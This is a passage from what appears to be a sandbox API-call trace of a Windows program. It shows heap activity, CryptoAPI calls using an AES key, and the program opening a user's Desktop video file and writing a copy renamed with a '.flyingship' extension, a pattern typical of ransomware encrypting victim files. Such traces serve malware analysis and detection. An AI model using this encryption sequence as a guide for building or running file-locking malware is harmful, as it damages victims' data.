RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0161.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0161.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.131] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0161.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.132] CryptDestroyHash (hHash=0x90af58) returned 1 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0161.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fl0fy8lpz-wjnvlo.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.134] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.134] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fl0fy8lpz-wjnvlo.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0161.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.139] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0161.139] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0161.142] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x6c92, lpOverlapped=0x0) returned 1 [0161.143] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0161.145] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16c92) returned 0x9e5190 [0161.145] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.145] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.145] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0161.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0161.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0161.146] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0161.146] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.147] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.147] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.147] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.148] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.148] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.148] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.148] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.148] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0161.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 